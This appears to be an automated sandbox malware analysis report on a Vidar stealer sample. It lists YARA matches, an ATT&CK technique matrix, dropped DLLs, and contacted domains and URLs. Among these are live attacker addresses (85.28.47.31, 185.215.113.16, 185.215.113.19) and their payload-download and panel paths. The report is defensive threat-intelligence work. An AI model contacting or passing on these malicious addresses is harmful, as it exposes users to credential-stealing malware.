Source: Yara match	File source: 0000002C.00000002.2900300016.00000000024CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2792599866.0000000002717000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2443461235.0000000002736000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 48f0ec6733.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 48f0ec6733.exe PID: 7884, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 3436, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C770C40 sqlite3_bind_zeroblob,	0_2_6C770C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C770D60 sqlite3_bind_parameter_name,	0_2_6C770D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C698EA0 sqlite3_clear_bindings,	0_2_6C698EA0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	11 Native API	1 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	112 Process Injection	4 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	111 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	23 Software Packing	NTDS	346 System Information Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	111 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	671 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Extra Window Memory Injection	Cached Domain Credentials	351 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	351 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	112 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Users\user\1000003002\ee7a49fbf0.exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://spocs.getpocket.com/spocs	0%	URL Reputation	safe
https://ads.stickyadstv.com/firefox-etp	0%	URL Reputation	safe
https://xhr.spec.whatwg.org/#sync-warning	0%	URL Reputation	safe
https://www.amazon.com/exec/obidos/external-search/	0%	URL Reputation	safe
http://win.mail.ru/cgi-bin/sentmsg?mailto=%s	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://MD8.mozilla.org/1/m	0%	URL Reputation	safe
https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=	0%	URL Reputation	safe
https://bugzilla.mo	0%	URL Reputation	safe
https://shavar.services.mozilla.com/	0%	URL Reputation	safe
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	0%	URL Reputation	safe
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	0%	URL Reputation	safe
https://spocs.getpocket.com/	0%	URL Reputation	safe
https://account.bellmedia.c	0%	URL Reputation	safe
https://login.microsoftonline.com	0%	URL Reputation	safe
https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fichef.bbci.co.uk%2Fimages%2Fic%2F480x	0%	Avira URL Cloud	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://support.google.com/inapp/	0%	URL Reputation	safe
https://apis.google.com	0%	URL Reputation	safe
https://identity.mozilla.com/apps/relay	0%	URL Reputation	safe
https://www.youtube.com/signin?action_handle_signin%253Dtrue%2526app%253Ddesktop%2526hl%253Den%2526n	0%	Avira URL Cloud	safe
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/3012260d-8f8d-4863-9be6-03970e37af68	0%	Avira URL Cloud	safe
http://85.28.47.31/8405906461a5200c/vcruntime140.dll	100%	Avira URL Cloud	malware
https://firefox.settings.services.mozilla.com/v1/	0%	Avira URL Cloud	safe
https://contile.services.mozilla.com/v1/tiles	0%	URL Reputation	safe
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/ddb01327-71d3-427b-8f25-2666ca1019bf	0%	Avira URL Cloud	safe
https://screenshots.firefox.com/	0%	URL Reputation	safe
https://www.wykop.pl/	0%	URL Reputation	safe
http://185.215.113.16/Jo89Ku7d/index.php5=	100%	Avira URL Cloud	phishing
http://185.215.113.19/ferences.SourceAumide	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpk=U	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php	100%	Avira URL Cloud	phishing
http://85.28.47.31/8405906461a5200c/freebl3.dllm$	100%	Avira URL Cloud	malware
https://github.com/mozilla-services/screenshots	0%	Avira URL Cloud	safe
https://www.hotels.com/?locale=en_US&pos=HCOM_US&siteid=300000001&rffrid=sem.hcom.US.AMP.003.00.03.s	0%	Avira URL Cloud	safe
http://r11.i.lencr.org/0(	0%	Avira URL Cloud	safe
https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/d88601ae-5293-43b2-9eaf-2ab6b	0%	Avira URL Cloud	safe
https://market-trk.com/50/9411?campaign=FF-SOV03-CompareCredit-BoATravel	0%	Avira URL Cloud	safe
http://185.215.113.16/Jo89Ku7d/index.phpncoded	100%	Avira URL Cloud	phishing
http://185.215.113.16/cost/random.exe	100%	Avira URL Cloud	phishing
http://85.28.47.31/8405906461a5200c/softokn3.dllA	100%	Avira URL Cloud	malware
https://ichef.bbci.co.uk/images/ic/480xn/p0jdbybk.jpg.webp	0%	Avira URL Cloud	safe
https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing	0%	Avira URL Cloud	safe
http://85.28.47.31/8405906461a5200c/softokn3.dll	100%	Avira URL Cloud	malware
http://185.215.113.19/Vi9leo/index.phpr(	100%	Avira URL Cloud	phishing
https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fimgix.bustle.com%2Fuploads%2Fimage%2F	0%	Avira URL Cloud	safe
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/d6977194-0ec3-4aef-b861-5cb96278213d	0%	Avira URL Cloud	safe
http://i.pki.goog/r1.crt0	0%	Avira URL Cloud	safe
https://www.motherjones.com/politics/2024/07/joe-biden-climate-legacy-donald-trump-kamala-harris/?ut	0%	Avira URL Cloud	safe
http://185.215.113.16/stealc/random.exe395d7f	100%	Avira URL Cloud	phishing
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/bfaa2e89-f7e3-478e-b83d-3bf27fc2c00f	0%	Avira URL Cloud	safe
http://85.28.47.31/8405906461a5200c/nss3.dll	100%	Avira URL Cloud	malware
https://eat.hungryroot.com/hungryroot-reset?utm_medium=paid	0%	Avira URL Cloud	safe
https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs3.us-east-1.amazonaws.com%2Fpocket-c	0%	Avira URL Cloud	safe
https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorp	0%	Avira URL Cloud	safe
https://www.google.com/favicon.ico	0%	Avira URL Cloud	safe
http://i.pki.goog/wr2.crt0	0%	Avira URL Cloud	safe
https://www.ebay.at/sch/	0%	Avira URL Cloud	safe
https://www.bbc.co.uk/	0%	Avira URL Cloud	safe
https://www.ebay.com/sch/	0%	Avira URL Cloud	safe
https://www.ebay.ie/	0%	Avira URL Cloud	safe
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/d4e275ab-c7a1-4d16-9407-d03d849b8e21	0%	Avira URL Cloud	safe
https://i.natgeofe.com/n/aa2728ac-4a75-4b3e-9163-2b32a66e9d1d/MM100710_230501_00795_16x9.JPG?w=1200	0%	Avira URL Cloud	safe
https://www.iqiyi.com/	0%	Avira URL Cloud	safe
http://r11.i.lencr.org/0d	0%	Avira URL Cloud	safe
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/d7f071e9-d3de-4df6-9079-ca2e3ecddc08	0%	Avira URL Cloud	safe
https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/2f642ebf-706d-4eac-8c53-46182	0%	Avira URL Cloud	safe
http://r3.o.lencr.org	0%	Avira URL Cloud	safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
https://tiles-cdn.prod.ads.prod.webservices.mozgcp.net/CAP5k4gWqcBGwir7bEEmBWveLMtvldFu-y_kyO3txFA=.	0%	Avira URL Cloud	safe
http://185.215.113.16/cost/random.exe7	100%	Avira URL Cloud	phishing
http://crl.pki.goog/gsr1/gsr1.crl0;	0%	Avira URL Cloud	safe
https://d1n0c1ufntxbvh.cloudfront.net/photo/eabcdc61/98254/1200x/	0%	Avira URL Cloud	safe
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/91ef2bf1-a36b-48dd-914e-195981ce7ea7	0%	Avira URL Cloud	safe
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/d03657b0-717f-46ce-ac76-f69d851cb204	0%	Avira URL Cloud	safe
https://www.google.com/tools/feedback/chat_load.js	0%	Avira URL Cloud	safe
http://85.28.47.31gl&(	0%	Avira URL Cloud	safe
http://185.215.113.19/002	100%	Avira URL Cloud	phishing
https://csp.withgoogle.com/csp/report-to/AccountsSignInUi	0%	Avira URL Cloud	safe
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/021a8f00-3de7-4da0-a723-1e308f3de9f9	0%	Avira URL Cloud	safe
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/dff96728-c23d-4f24-91c7-9233d01352d4	0%	Avira URL Cloud	safe
https://www.zhihu.com/	0%	Avira URL Cloud	safe
https://www.ebay.nl/sch/	0%	Avira URL Cloud	safe
http://c.pki.goog/r/r1.crl0	0%	Avira URL Cloud	safe
http://185.215.113.16/Jo89Ku7d/index.phpx=$	100%	Avira URL Cloud	phishing
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/7cc0fd66-fa48-46f1-9a0e-537764d9a4da	0%	Avira URL Cloud	safe
https://www.ebay.at/	0%	Avira URL Cloud	safe
https://img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fmedia.wired.com%2Fphotos%2F669ee1db82dcc6be43bb872a%2F191%3A100%2Fw_1280%2Cc_limit%2FAMOC_Laerke_011.jpg	0%	Avira URL Cloud	safe
https://mail.yahoo.co.jp/compose/?To=%s	0%	Avira URL Cloud	safe
https://images.fastcompany.com/image/upload/f_auto	0%	Avira URL Cloud	safe
https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs.zkcdn.net%2FAdvertisers%2F8c6ba2700	0%	Avira URL Cloud	safe
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/f11c1bba-0d2e-44d8-acb1-e375719dd8b8	0%	Avira URL Cloud	safe
https://www.amazon.co.uk/	0%	Avira URL Cloud	safe
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/c8ad0165-121f-4bc8-bdd1-a2822cb41726	0%	Avira URL Cloud	safe
https://tiles-cdn.prod.ads.prod.webservices.mozgcp.net/m6BvG6Rcntmafem2bLfA5IktKm1SEwqO2E4XIjaC12c=.10862.jpg	0%	Avira URL Cloud	safe
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/41a4b1d8-9773-4011-ab45-8d749a67cebd	0%	Avira URL Cloud	safe
https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/f9b342d5-c87b-4c3e-a8c4-0609f	0%	Avira URL Cloud	safe
http://185.215.113.19/Vi9leo/index.php003002	100%	Avira URL Cloud	phishing
https://www.ebay.com.au/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
example.org	93.184.215.14	true	false	unknown
chrome.cloudflare-dns.com	162.159.61.3	true	false	unknown
market-trk.com	104.18.12.104	true	false	unknown
prod.detectportal.prod.cloudops.mozgcp.net	34.107.221.82	true	false	unknown
services.addons.mozilla.org	18.65.39.112	true	false	unknown
prod.pocket.prod.cloudops.mozgcp.net	34.120.5.221	true	false	unknown
tiles-cdn.prod.ads.prod.webservices.mozgcp.net	34.36.165.17	true	false	unknown
ww55.affinity.net	34.160.134.7	true	false	unknown
www.romper.com	143.204.98.82	true	false	unknown
firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net	34.149.97.1	true	false	unknown
mitmdetection.services.mozilla.com	143.204.9.50	true	false	unknown
contile.services.mozilla.com	34.117.188.166	true	false	unknown
prod.content-signature-chains.prod.webservices.mozgcp.net	34.160.144.191	true	false	unknown
www.jezebel.com	172.67.13.9	true	false	unknown
us-west1.prod.sumo.prod.webservices.mozgcp.net	34.149.128.2	true	false	unknown
ipv4only.arpa	192.0.0.170	true	false	unknown
www.mozorg.moz.works	18.239.17.158	true	false	unknown
eat.hungryroot.com	159.89.133.227	true	false	unknown
prod.ads.prod.webservices.mozgcp.net	34.117.188.166	true	false	unknown
www.google.com	172.217.18.4	true	false	unknown
www.themarshallproject.org	104.22.69.164	true	false	unknown
star-mini.c10r.facebook.com	157.240.252.35	true	false	unknown
prod.classify-client.prod.webservices.mozgcp.net	35.190.72.216	true	false	unknown
prod.balrog.prod.cloudops.mozgcp.net	35.244.181.201	true	false	unknown
img-prod.pocket.prod.cloudops.mozgcp.net	34.120.237.76	true	false	unknown
twitter.com	104.244.42.1	true	false	unknown
getpocket.com	143.204.98.129	true	false	unknown
www.wired.com	108.156.60.57	true	false	unknown
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	unknown
dyna.wikimedia.org	185.15.59.224	true	false	unknown
prod.remote-settings.prod.webservices.mozgcp.net	34.149.100.209	true	false	unknown
pki-goog.l.google.com	142.250.185.227	true	false	unknown
youtube-ui.l.google.com	172.217.18.14	true	false	unknown
attachments.prod.remote-settings.prod.webservices.mozgcp.net	34.117.121.53	true	false	unknown
www3.l.google.com	142.250.185.238	true	false	unknown
play.google.com	142.250.185.142	true	false	unknown
reddit.map.fastly.net	151.101.65.140	true	false	unknown
d3ag4hukkh62yn.cloudfront.net	99.86.2.175	true	false	unknown
googlehosted.l.googleusercontent.com	142.250.185.161	true	false	unknown
telemetry-incoming.r53-2.services.mozilla.com	34.120.208.123	true	false	unknown
spocs.getpocket.com	unknown	unknown	true	unknown
clients2.googleusercontent.com	unknown	unknown	true	unknown
firefox.settings.services.mozilla.com	unknown	unknown	true	unknown
www.youtube.com	unknown	unknown	true	unknown
r3.o.lencr.org	unknown	unknown	true	unknown
detectportal.firefox.com	unknown	unknown	true	unknown
bzib.nelreports.net	unknown	unknown	true	unknown
www.expedia.com	unknown	unknown	true	unknown
o.pki.goog	unknown	unknown	true	unknown
shavar.services.mozilla.com	unknown	unknown	true	unknown
www.reddit.com	unknown	unknown	true	unknown
content-signature-2.cdn.mozilla.net	unknown	unknown	true	unknown
support.mozilla.org	unknown	unknown	true	unknown
push.services.mozilla.com	unknown	unknown	true	unknown
www.facebook.com	unknown	unknown	true	unknown
r11.o.lencr.org	unknown	unknown	true	unknown
img-getpocket.cdn.mozilla.net	unknown	unknown	true	unknown
r10.o.lencr.org	unknown	unknown	true	unknown
firefox-api-proxy.cdn.mozilla.net	unknown	unknown	true	unknown
www.amazon.com	unknown	unknown	true	unknown
accounts.youtube.com	unknown	unknown	true	unknown
www.wikipedia.org	unknown	unknown	true	unknown
getpocket.cdn.mozilla.net	unknown	unknown	true	unknown
firefox-settings-attachments.cdn.mozilla.net	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://85.28.47.31/8405906461a5200c/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/ddb01327-71d3-427b-8f25-2666ca1019bf	false	Avira URL Cloud: safe	unknown
https://firefox.settings.services.mozilla.com/v1/	false	Avira URL Cloud: safe	unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/3012260d-8f8d-4863-9be6-03970e37af68	false	Avira URL Cloud: safe	unknown
https://spocs.getpocket.com/spocs	false	URL Reputation: safe	unknown
http://185.215.113.19/Vi9leo/index.php	true	Avira URL Cloud: phishing	unknown
http://85.28.47.31/8405906461a5200c/softokn3.dll	true	Avira URL Cloud: malware	unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/d6977194-0ec3-4aef-b861-5cb96278213d	false	Avira URL Cloud: safe	unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/bfaa2e89-f7e3-478e-b83d-3bf27fc2c00f	false	Avira URL Cloud: safe	unknown
http://85.28.47.31/8405906461a5200c/nss3.dll	true	Avira URL Cloud: malware	unknown
https://www.google.com/favicon.ico	false	Avira URL Cloud: safe	unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/d4e275ab-c7a1-4d16-9407-d03d849b8e21	false	Avira URL Cloud: safe	unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/d7f071e9-d3de-4df6-9079-ca2e3ecddc08	false	Avira URL Cloud: safe	unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/91ef2bf1-a36b-48dd-914e-195981ce7ea7	false	Avira URL Cloud: safe	unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/d03657b0-717f-46ce-ac76-f69d851cb204	false	Avira URL Cloud: safe	unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/021a8f00-3de7-4da0-a723-1e308f3de9f9	false	Avira URL Cloud: safe	unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/dff96728-c23d-4f24-91c7-9233d01352d4	false	Avira URL Cloud: safe	unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/7cc0fd66-fa48-46f1-9a0e-537764d9a4da	false	Avira URL Cloud: safe	unknown
https://img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fmedia.wired.com%2Fphotos%2F669ee1db82dcc6be43bb872a%2F191%3A100%2Fw_1280%2Cc_limit%2FAMOC_Laerke_011.jpg	false	Avira URL Cloud: safe	unknown
https://contile.services.mozilla.com/v1/tiles	false	URL Reputation: safe	unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/f11c1bba-0d2e-44d8-acb1-e375719dd8b8	false	Avira URL Cloud: safe	unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/c8ad0165-121f-4bc8-bdd1-a2822cb41726	false	Avira URL Cloud: safe	unknown
https://tiles-cdn.prod.ads.prod.webservices.mozgcp.net/m6BvG6Rcntmafem2bLfA5IktKm1SEwqO2E4XIjaC12c=.10862.jpg	false	Avira URL Cloud: safe	unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/41a4b1d8-9773-4011-ab45-8d749a67cebd	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fichef.bbci.co.uk%2Fimages%2Fic%2F480x	firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/Jo89Ku7d/index.phpk=U	axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php5=	axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://www.youtube.com/signin?action_handle_signin%253Dtrue%2526app%253Ddesktop%2526hl%253Den%2526n	firefox.exe, 00000021.00000003.3204676713.0000016DE9EA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ads.stickyadstv.com/firefox-etp	firefox.exe, 00000021.00000003.2866313930.0000016DDE1FC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.19/ferences.SourceAumide	explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://xhr.spec.whatwg.org/#sync-warning	firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.amazon.com/exec/obidos/external-search/	firefox.exe, 00000021.00000003.2813756993.0000016DDD36B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3152391838.0000016DDE0B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2811196569.0000016DDD350000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3191939859.0000016DE9A8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207334568.0000016DDE0B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809919292.0000016DDD336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809382625.0000016DDD100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2814195790.0000016DDD383000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3144642447.0000016DDE0B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3190357375.0000016DDE0B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3167800992.0000016DEA9DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4BC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2896976566.0000016DDE12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3165602215.0000016DEA9EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3166260392.0000016DEA9DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3161465579.0000016DE4BD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://85.28.47.31/8405906461a5200c/freebl3.dllm$	file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/mozilla-services/screenshots	firefox.exe, 00000021.00000003.2813756993.0000016DDD36B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2811196569.0000016DDD350000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809919292.0000016DDD336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809382625.0000016DDD100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hotels.com/?locale=en_US&pos=HCOM_US&siteid=300000001&rffrid=sem.hcom.US.AMP.003.00.03.s	firefox.exe, 00000021.00000003.3212471692.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158551690.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/d88601ae-5293-43b2-9eaf-2ab6b	firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://market-trk.com/50/9411?campaign=FF-SOV03-CompareCredit-BoATravel	firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncoded	axplong.exe, 00000014.00000002.3277275647.00000000007BF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://85.28.47.31/8405906461a5200c/softokn3.dllA	file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://r11.i.lencr.org/0(	firefox.exe, 00000021.00000003.3156750421.0000016DEA3BF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ichef.bbci.co.uk/images/ic/480xn/p0jdbybk.jpg.webp	firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/cost/random.exe	explorti.exe, 00000013.00000002.3285409912.000000000145B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing	firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.19/Vi9leo/index.phpr(	explorti.exe, 00000013.00000002.3285409912.0000000001489000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
